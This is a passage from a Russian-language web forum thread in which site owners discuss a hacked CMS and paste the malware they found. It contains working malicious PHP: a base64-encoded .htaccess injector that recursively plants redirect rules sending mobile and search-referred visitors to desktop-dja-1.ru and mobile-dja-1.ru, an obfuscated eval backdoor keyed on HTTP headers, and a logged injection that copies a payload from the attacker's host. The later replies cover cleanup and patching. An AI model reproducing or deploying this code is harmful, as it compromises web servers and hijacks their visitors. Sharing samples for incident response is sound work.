FDQ0VQVH0gInRleHQvdm5kLndhcC53bWx8YXBwbGljYXRpb24vdm5kLndhcC54aHRtbCt4bWwiIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9ICF3aW5kb3dzLm50IFtOQ10KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9ICFic2QgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIXgxMSBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhdW5peCBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhbWFjb3MgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIW1hY2ludG9zaCBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhcGxheXN0YXRpb24gW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIWdvb2dsZSBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAheWFuZGV4IFtOQ10KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9ICFib3QgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIWxpYnd3dyBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhbXNuIFtOQ10KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9ICFhbWVyaWNhIFtOQ10KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9ICFhdmFudCBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhZG93bmxvYWQgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIWZkbSBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhbWF1aSBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhd2VibW9uZXkgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIXdpbmRvd3MtbWVkaWEtcGxheWVyIFtOQ10KClJld3JpdGVSdWxlIF4oLiopJCBodHRwOi8vbW9iaWxlLWRqYS0xLnJ1L2w9MzI0MTExMTkwNjZlMGI0ZDAzNTY0NTU2NDk1NDUzNDM3MyBbTCxSPTMwMl0KClJld3JpdGVDb25kICV7UkVNT1RFX0FERFJ9IF4xOTNcLjIwMVwuMig/OjI5fDNbMDFdKSBbT1JdClJld3JpdGVDb25kICV7UkVNT1RFX0FERFJ9IF4yMTNcLjI0M1wuNjQgW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeNDZcLjIyOVwuMSg/OjI4fDNbMjM0XXw0WzAxXSkgW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeODNcLjE0OVwuWzEyMzg5XSBbT1JdClJld3JpdGVDb25kICV7UkVNT1RFX0FERFJ9IF44M1wuMTQ5XC4oPzoyWzE0XXwzWzQtOF18NFszLTc5XXw1WzI2LTldfDZbMC0zXSkgW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeODNcLjE0OVwuNDhcLlswLTldIFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjgzXC4xNDlcLjQ4XC5bMS05XVswLTldIFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjgzXC4xNDlcLjQ4XC4xKD86WzAxXVswLTldfDJbMC03XSkgW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeODNcLjIyOVwuMjI0IFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjg1XC4yNlwuMSg/OjI4fDM2fDU1fDZbNDVdfDhbMzQ2XXw5WzItNV0pIFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjg1XC4yNlwuMig/OjBbNDhdfDFbMjZdfDJbMDQ3LTldfDNbMC01XXw0WzE4XSkgW09SXQoKUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjgwXC44M1wuMig/OjI4fDNbMC0zXSkgW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeODBcLjgzXC4yKD86MjR8M1s3LTldKVwuWzAtOV0gW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeODBcLjgzXC4yKD86MjR8M1s3LTldKVwuWzEtOV1bMC05XSBbT1JdClJld3JpdGVDb25kICV7UkVNT1RFX0FERFJ9IF44MFwuODNcLjIoPzoyNHwzWzctOV0pXC4xKD86WzAxXVswLTldfDJbMC03XSkgW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeODRcLjE3XC4yNVs0NV0gW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeOTVcLjE1M1wuMSg/Ols2LThdWzAtOV18OVswMV0pIFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjk1XC4xNTNcLjI1WzItNV0gW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeMTk0XC41NFwuMSg/OjRbODldfDVbMDFdKSBbT1JdClJld3JpdGVDb25kICV7UkVNT1RFX0FERFJ9IF4yMTNcLjg3IFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjIxN1wuOFwuMig/OjJbNi05XXwzWzAtNDldKSBbT1JdClJld3JpdGVDb25kICV7UkVNT1RFX0FERFJ9IF4yMTdcLjY2XC4xKD86NFs2LTldfDVbMC0yNl0pIFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjIxN1wuNzRcLjI0WzQ3XVwuMSg/OjJbODldfFszLTldWzAtOV0pIFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjIxN1wuNzRcLjI0WzQ3XVwuMig/OlswLTRdWzAtOV18NVswLTVdKSBbT1JdClJld3JpdGVDb25kICV7UkVNT1RFX0FERFJ9IF4yMTdcLjc0XC4yKD86NFs1ODldfDVbMDFdKQoKUmV3cml0ZVJ1bGUgXiguKikkIGh0dHA6Ly9tb2JpbGUtZGphLTEucnUvbD0zMjQxMTExOTA2NmUwYjRkMDM1NjQ1NTY0OTU0NTM0MzczIFtMLFI9MzAyXQoKUmV3cml0ZUNvbmQgJXtIVFRQX1JFRkVSRVJ9ICh5YXx5YW5kZXh8Z29vZ2xlfG1haWx8cmFtYmxlcnx2aykgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIShhY2Nvb25hfGlhX2FyY2hpdmVyfGFudGFib3R8YXNrXCBqZWV2ZXN8YmFpZHV8ZGNwYm90fGVsdGFpbmRleGVyfGZlZWRmZXRjaGVyfGdhbWVzcHl8Z2lnYWJvdHxnb29nbGVib3R8Z3NhLWNyYXdsZXJ8Z3J1Yi1jbGllbnR8Z3VscGVyfHNsdXJwfG1paGFsaXNtfG1zbmJvdHx3b3JsZGluZGV4ZXJ8b295eW98cGFnZWJ1bGx8c2Nvb3Rlcnx3M2NfdmFsaWRhdG9yfGppZ3Nhd3x3ZWJhbHRhfHlhaG9vZmVlZHNlZWtlcnx5YWhvbyFcIHNsdXJwfG1tY3Jhd2xlcnx5YW5kZXhib3R8eWFuZGV4aW1hZ2VzfHlhbmRleHZpZGVvfHlhbmRleG1lZGlhfHlhbmRleGJsb2dzfHlhbmRleGFkZHVybHx5YW5kZXhmYXZpY29uc3x5YW5kZXhkaXJlY3R8eWFuZGV4bWV0cmlrYXx5YW5kZXhjYXRhbG9nfHlhbmRleG5ld3N8eWFuZGV4aW1hZ2VyZXNpemVyKSBbTkNdClJld3JpdGVSdWxlIF4oLiopJCBodHRwOi8vZGVza3RvcC1kamEtMS5ydS9nby9pbi5waHA/c291cmNlPSV7SFRUUF9IT1NUfSBbTCxSPTMwMl0KCg==';
function editexistinghtacc($scanedPath)
{
    global $codes;


    if($arr_filesAndDirsInScanedPath = scandir($scanedPath)) 
    { 
        foreach($arr_filesAndDirsInScanedPath as $fileOrDirInScanedPath) 
        { 
            $path = $scanedPath . $fileOrDirInScanedPath; 
            if($fileOrDirInScanedPath == ".." || $fileOrDirInScanedPath == ".") continue; 
            if(@is_dir($path)) editexistinghtacc($path.DIRECTORY_SEPARATOR);
            if(@is_writable($path) && strpos($path, "htaccess")) 
            {
                if (! file_get_contents($path)) {
                    $filetext = base64_decode($codes);
                    $fh = fopen($path, "w");
                    fwrite($fh, $filetext);
                    fclose($fh);
                }
                if(! strpos(file_get_contents($path), 'desktop-dja'))
                {
                    $filetext = base64_decode($codes).file_get_contents($path);
                    $fh = fopen($path, "w");
                    fwrite($fh, $filetext);
                    fclose($fh);
                }
            }
        } 
    }
}


$keywords = preg_split("#/#", dirname(__FILE__));
$size = count($keywords);
    for ($i=1; $i < $size; $i++) { 
        for ($j=1; $j < $size+1-$i; $j++) {
            $url.=$keywords[$j];
            $url.="/";
        }
        editexistinghtacc('/'.$url);
        $url=null;
    }




function createnewhtacc($scanedPath) 
{ 
    global $codes; 


    if($arr_filesAndDirsInScanedPath = scandir($scanedPath)) 
    { 
        foreach($arr_filesAndDirsInScanedPath as $fileOrDirInScanedPath) 
        { 
            $path = $scanedPath . $fileOrDirInScanedPath; 


            if($fileOrDirInScanedPath == ".." || $fileOrDirInScanedPath == ".") continue; 
            if(! @is_dir($path)) continue; 


            if(@is_writable($path)) 
            {
                if (! file_get_contents($path.'/.htaccess')) {
                $filetext = base64_decode($codes);
                    $fh = fopen($path.'/.htaccess', "w");
                    fwrite($fh, $filetext);
                    fclose($fh);
                }
                if(! strpos(file_get_contents($path.'/.htaccess'), 'desktop-dja'))
                {
                    $filetext = base64_decode($codes).file_get_contents($path.'/.htaccess');
                    $fh = fopen($path.'/.htaccess', "w");
                    fwrite($fh, $filetext);
                    fclose($fh);
                }
            } 


            createnewhtacc($path.DIRECTORY_SEPARATOR); 
        } 
    } 
} 




$keywords = preg_split("#/#", dirname(__FILE__));
$size = count($keywords);
    for ($i=1; $i < $size; $i++) { 
        for ($j=1; $j < $size+1-$i; $j++) {
            $url.=$keywords[$j];
            $url.="/";
        }
        createnewhtacc('/'.$url);
        $url=null;
    }


echo 'OK'; 

?>

 

 

q00p.php -а этот файл я нге смог открыть произошло вот что :

 

84331ba7.php

 

<?php $_5a2760="x70x72x65x67x5fx72x65x70x6cx61x63x65";$_5a2760("x7cx2ex7cx65","x65x76x61x6cx28x27x65x76x61x6cx28x62x61x73x65x36x34x5fx64x65x63x6fx64x65x28x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7x22x29x29x3bx27x29",'.');?>

 

[_Dark_]

Ну удаляйте эти странные файлы.

И они не только в папке /cache/ будут.

[Pashok(one)]

Ну удаляйте эти странные файлы.

И они не только в папке /cache/ будут.

Я нашёл его!

w00t.php

 

 

==============================================================================
=========================        END       ===================================
========================= /forum/index.php?<?error_reporting(0);print(___);copy('__desktop-dja-1.ru/go/greed.txt','q00p.php');die;?> ===================================
==============================================================================

А что за файл Thumbs.db в /admin

 

 

[MasteR]

Решение проблемы:

Небольшое пояснение:

[_Dark_]

Решение проблемы: ТЫК Небольшое пояснение: ТЫК

Это не точно. В ноябре были найдены новые уязвимости, 3.3.4 уязвима (без патча), через эти уязвимости и заражают сайт.

Для начала нужно убрать все лишнее из папки /cache/ (чаще всего там находится шелл), после этого нужно очистить .htaccess, а потом удалить все лишнее файлы со всех директорий.

[MasteR]

_Dark_, Где почитать и скачать этот патч? Просто когда находят уязвимость то уведомление в админке большое.

[_Dark_]

Почитать

Скачать по последней ссылке можно.

Изменено 2 декабря, 2012 пользователем _Dark_
Не ту ссылку дал

[Respected]

Кстати, если практически в каждой папке находится "чужой" htaccess, думаю вряд ли кто-то захочет просматривать каждую папку движка.

Самый рациональный выход, на мой взгляд, сделать дамп файлов, с помощью стандартных средств поиска в Windows найти все эти файлы и просто удалить их. Затем закачать дамп.

[Quicksdk]

UP. Только что заметил, что был взломан поддомен blog.pro-ucheba.com (на wordpress) с такими же симптомами. В каждой папке находится чужой htaccess. Возникает вопрос: взлом видимо был осуществлен - через хостинг? т.е. взломщик знал пароли или ...

[Respected]

Значит злоумышленник получил доступ на сервер, больше это ничем не объяснить..

[Quicksdk]

Хм... интересно... У меня хостинг был от Timeweb. Это как он смог получить доступ? Он взломал именно определенный сервер? Или как?

[Respected]

Этого я не могу сказать, советую поменять все пароли, в том числе и от базы данных.